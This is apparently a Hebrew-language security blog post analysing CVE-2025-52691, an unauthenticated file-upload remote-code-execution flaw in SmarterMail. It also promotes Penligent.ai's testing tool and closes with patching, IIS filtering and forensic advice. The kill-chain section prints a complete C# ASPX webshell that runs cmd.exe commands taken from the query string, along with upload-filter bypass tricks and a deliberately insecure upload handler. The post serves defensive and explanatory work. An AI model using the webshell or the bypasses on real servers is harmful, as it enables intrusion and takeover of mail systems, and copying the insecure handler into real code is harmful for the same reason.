System.IO.FileStream ל-SYSTEM Shell: ניתוח פורנזי של CVE-2025-52691 (SmarterMail RCE)

עם תחילת שנת 2026, קהילת אבטחת הסייבר מתמודדת עם כשל ארכיטקטוני חמור באחד משרתי הדואר הפופולריים ביותר המבוססים על Windows. ב-30 בדצמבר 2025, הסוכנות לאבטחת סייבר של סינגפור (CSA) ו-SmarterTools אישרו את קיומו של CVE-2025-52691, פגיעות בעלת דירוג החומרה המרבי: CVSS 10.0.

עבור חברי צוות Red Team ומפתחי תוכנות ניצול, פגיעות זו מהווה את "גביע הקדוש": העלאת קבצים שרירותית ללא אימות מוביל ישירות אל ביצוע קוד מרחוק (RCE) כמו מערכת. הוא אינו דורש אישורים, אינו מצריך אינטראקציה מצד המשתמש, ומנצל פגם לוגי בסיסי באופן שבו היישום מטפל בזרמי נתונים נכנסים.

מאמר זה נמנע מתיאורים כלליים ברמה גבוהה ומציג ניתוח מעמיק של הפגיעות. ננתח כיצד נקודות הקצה של .NET נכשלות, כיצד צינור שירותי המידע באינטרנט (IIS) מטפל במטענים זדוניים וכיצד אבטחה מודרנית מבוססת בינה מלאכותית יכולה לזהות איומים לוגיים אלה לפני שהם הופכים לנשק.

נוף האיומים: מדוע CVE-2025-52691 הוא "פריצת דרך"

SmarterMail היא חלופה נפוצה ל-Microsoft Exchange, הפועלת על Windows/IIS/.NET stack. בניגוד לשרתי דואר מבוססי לינוקס, שבהם הרשאות מערכת הקבצים עשויות למתן את ההשפעה של העלאת קבצים, סביבות Windows IIS ידועות כבלתי סלחניות כאשר מתרחשות שגיאות תצורה.

כרטיס מודיעין פגיעות

הסכנה כאן היא משטח התקפה. שרתים דואר אלקטרוני, על פי הגדרתם, חשופים לאינטרנט הציבורי ביציאות 25, 443, ולעתים קרובות גם 9998 (דואר אלקטרוני/ניהול). פגיעות שאינה דורשת אימות ומספקת מעטפת יציבה מאפשרת לבוטנטים אוטומטיים לפגוע באלפי שרתים בתוך שעות ספורות מרגע שחרור ה-PoC.

ניתוח טכני מעמיק: המכניקה של הפגם

כדי להבין כיצד פועל CVE-2025-52691, עלינו לנתח את אופן הטיפול של SmarterMail בבקשות HTTP. הפגיעות נמצאת בנקודת קצה API ספציפית שנועדה לטפל בקבצים מצורפים או בהעלאות משתמשים — ככל הנראה חלק מממשק הדואר האלקטרוני או ה- אחסון קבצים מרחב שמות.

"שומר הסף" החסר

ביישום .NET מאובטח, כל פעולת בקר המטפלת בקבצים צריכה להיות מעוטרת ב- [אשר] תכונות ולוגיקת אימות קבצים קפדנית. CVE-2025-52691 קיים מכיוון שמטפל ספציפי — ככל הנראה מטפל גנרי .ashx מטפל או נתיב REST API — נחשף ללא בדיקות אלה.

כאשר בקשת POST מגיעה לנקודת קצה זו, השרת מעבד את multipart/form-data זרם. מכיוון שנקודת הקצה חסרה מחסום אימות, השרת מקבל את הזרם מכל כתובת IP.

תבנית הקוד הפגיע (משוחזרת)

אמנם קוד המקור המדויק הוא קנייני, אך אנו יכולים לשחזר את דפוס הפגיעות בהתבסס על סוגי פגיעות .NET סטנדרטיים ועל אופי התיקון. הפגם דומה ככל הנראה ללוגיקה C# הבאה:

C#

`public class LegacyUploadHandler : IHttpHandler { public void ProcessRequest(HttpContext context) { // פגם קטלני 1: אין בדיקת הפעלה או אימות // המטפל מניח שהמתקשר הוא אמין רק משום שהגיע לכתובת URL זו. // חסר: if (context.Session[“User”] == null) throw new UnauthorizedAccessException();

    HttpPostedFile file = context.Request.Files["upload"]; string fileName = file.FileName; // פגם קטלני 2: אמון בקלט המשתמש עבור נתיבי קבצים // הקוד לוקח את שם הקובץ ישירות מכותרות הלקוח.
    // הוא נכשל בניקוי מפני Directory Traversal (../) או סיומות הפעלה (.aspx). string savePath = context.Server.MapPath("~/App_Data/Temp/" + fileName); // פגם קטלני 3: כתיבה לספרייה הנגישה באינטרנט file.SaveAs(savePath); }

}`

צינור הביצוע של IIS

מדוע העלאת קובץ היא פעולה קטלנית? במרבית הסטקים המודרניים (Node.js, Go), העלאת קובץ מקור אינה מובילה אוטומטית לביצוע. אך ב- ASP.NET פועל ב-IIS, ההתנהגות שונה בשל מיפוי מודול ISAPI.

אם תוקף יכול למקם קובץ עם .aspx, .ashx, או .סבון הרחבה לספרייה המאפשרת ביצוע סקריפטים (שהיא ברירת המחדל ברוב ספריות האינטרנט התומכות בתכונות ASP ישנות), תהליך העבודה של IIS (w3wp.exe) יפעיל את הרצף הבא:

1. התוקף מעלה קבצים shell.aspx.
2. בקשות התוקף GET /App_Data/Temp/shell.aspx.
3. מאזין מצב ליבת IIS (http.sys) מקבל את הבקשה ומעביר אותה לתהליך העובד.
4. ASP.NET מטפל רואה את ההרחבה הידועה.
5. קומפילציה JIT: CLR (Common Language Runtime) מהדר את הקוד בתוך shell.aspx על הדרך לתוך DLL זמני.
6. ביצוע: ה-DLL נטען לזיכרון ומבוצע עם הרשאות הזהות של מאגר היישומים (לעתים קרובות מערכת או שירות רשת).

שרשרת ההרג: מהגילוי ועד מעטפת ה-SYSTEM

עבור מהנדס אבטחה המדמה מסלול תקיפה זה, שרשרת ההשמדה כוללת ארבעה שלבים נפרדים.

שלב 1: סיור

התוקף סורק את טביעת האצבע של SmarterMail.

• כותרות: שרת: Microsoft-IIS/10.0, X-Powered-By: ASP.NET
• כותרת: כניסה ל-SmarterMail
• בדיקת נקודות קצה: Fuzzing עבור נקודות קצה ידועות להעלאה כמו /api/v1/settings/upload, /FileStorage/Upload.ashx, או נקודות קצה SOAP ישנות שעשויות להישכח במהלך בדיקות אבטחה.

שלב 2: הפיכתו לנשק

התוקף יוצר "Webshell". מטען Webshell C# קלאסי נועד לבצע פקודות מערכת באמצעות cmd.exe.

<%@ Page Language="C#" %> <%@ Import Namespace="System.Diagnostics" %> <script runat="server"> protected void Page_Load(object sender, EventArgs e) { // Simple command execution logic if (!string.IsNullOrEmpty(Request.QueryString["cmd"])) { Process p = new Process(); p.StartInfo.FileName = "cmd.exe"; p.StartInfo.Arguments = "/c " + Request.QueryString["cmd"]; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true; p.Start(); Response.Write(p.StandardOutput.ReadToEnd()); p.WaitForExit(); } } </script>

שלב 3: ביצוע (הניצול)

התוקף שולח את בקשת ה-POST.

• טכניקת עקיפה: אם השרת מיישם אימות חלש (למשל, בדיקת סוג תוכן), התוקף משנה את הכותרת ל- סוג תוכן: image/jpeg. אם השרת בודק הרחבות אך יש בו שגיאה לוגית (למשל, בדיקת 3 התווים הראשונים בלבד), התוקף עשוי לנסות shell.aspx.jpg או לנצל טריקים של זרם נתונים חלופי NTFS (shell.aspx::$DATA) כדי לעקוף את המסנן תוך כדי כתיבת קובץ ש-IIS יבצע.

שלב 4: ניצול

התוקף ניגש למעטפת:

תגובה: רשות\\מערכת

בשלב זה, המשחק נגמר. התוקף יכול לשפוך את תהליך LSASS כדי לחלץ את פרטי הזדהות המנהל, להתקין תוכנת כופר או להשתמש בשרת הדואר כנקודת מפתח לתקיפת בקר התחום.

תפקידה של הבינה המלאכותית באיתור פגמים לוגיים: הגישה הפנליגנטית

כלי DAST (בדיקות אבטחת יישומים דינמיות) מסורתיים ידועים כגרועים באיתור CVE-2025-52691 באגים בסגנון.

1. עיוורון קונטקסטואלי: סורקים מסתמכים על סריקת קישורי HTML. נקודות קצה API שאינן מקושרות במפורש ב-DOM (נקודות קצה מוסתרות) אינן נראות להם.
2. פחד מהרס: הסורקים מהססים להעלות קבצים מחשש לפגיעה ביישום או להצפת האחסון.

זה המקום שבו Penligent.ai מייצג שינוי פרדיגמה עבור צוותי אבטחה התקפית. Penligent עושה שימוש ב- ניתוח לוגי מבוסס בינה מלאכותית במקום התאמת תבניות פשוטה.

1. גילוי הבלתי ניתן לגילוי

סוכני Penligent מנתחים חבילות JavaScript בצד הלקוח ו-DLLs מהודרים (אם הם נגישים באמצעות דליפות) כדי לשחזר את מפת ה-API. הם מסיקים על קיומם של מטפלי העלאה שאינם מקושרים באופן מפורש, ובכך מוצאים את "API הצללים" שבהם מסתתרות פגיעויות כמו CVE-2025-52691.

2. הוכחה לא הרסנית לניצול

במקום להעלות קובץ webshell זדוני שעלול להפעיל EDRs או לשבש את פעולת השרת, Penligent מייצר קובץ Benign Marker File.

• פעולה: הוא מעלה קובץ טקסט פשוט המכיל חתימה קריפטוגרפית ייחודית.
• אימות: לאחר מכן, הוא מנסה לאחזר את הקובץ באמצעות כתובת URL ציבורית.
• תוצאה: אם הקובץ ניתן לשחזור, Penligent מאשרת את העלאת קבצים ללא הגבלות פגיעות (CWE-434) בוודאות של 100% ובסיכון אפסי. הדבר מספק למנהל אבטחת המידע (CISO) מידע מודיעיני בר-ביצוע ללא רעש של תוצאות חיוביות כוזבות.

אסטרטגיית תיקון וחיזוק

אם אתה מפעיל את SmarterMail, אתה נמצא במרוץ נגד הזמן.

1. תיקון מיידי

שדרג מיד לגרסה 9413. SmarterTools יישמה בדיקות אימות קפדניות ואימות סיומות קבצים מבוסס רשימת היתרים בגרסה זו.

2. סינון בקשות IIS (הקלה זמנית)

אם אינך יכול להתקין את התיקון באופן מיידי, עליך לחסום את וקטור ההתקפה ברמת שרת האינטרנט. השתמש בסינון בקשות IIS כדי למנוע גישה לקבצי .aspx בספריות העלאה.

• פעולה: במנהל IIS -> סינון בקשות -> הכרטיסייה URL -> רצף דחייה.
• כלל: חסום בקשות ל /App_Data/*.aspx או /FileStorage/*.aspx.

3. ציד פורנזי

הנח שאתה כבר נפגעת. חפש במערכת הקבצים את:

• קבצים המסתיימים ב- .aspx, .ashx, .cer, .סבון נוצר בין 29 בדצמבר 2025 לבין היום.
• יומני IIS (u_ex*.log) עבור בקשות POST להעלאת נקודות קצה שמגיעות מכתובות IP לא ידועות, ואחריהן מיד בקשות GET לקבצים חדשים.

סיכום

CVE-2025-52691 מהווה תזכורת חדה לכך שבעולם התוכנה, הנוחות לעתים קרובות באה על חשבון האבטחה. בדיקת אימות אחת חסרה במנהל העלאת קבצים "משני" עלולה להפוך מיליוני דולרים שהושקעו בחומת אש וב-EDR למיותרים.

ככל שנתקדם לעבר שנת 2026, מורכבות ההתקפות רק תגדל. מהנדסי אבטחה חייבים לעבור משימוש ברשימות בדיקה ידניות לאימוץ כלים אוטומטיים וחכמים לאימות. בין אם מדובר בתיקון תוכנה הלילה או בפריסת בדיקות מבוססות בינה מלאכותית מחר, המטרה נשארת זהה: לסגור את הדלת לפני שהיריב ייכנס.

הפניות אמינות

• הודעה מטעם CSA סינגפור: CSA מפרסמת התראה על באג קריטי ב-SmarterMail
• הודעה מ-SmarterTools: פגיעות קריטית ב-SmarterMail Build 9406
• הקשר CVE קשור: פגיעויות שבועיות של WaterISAC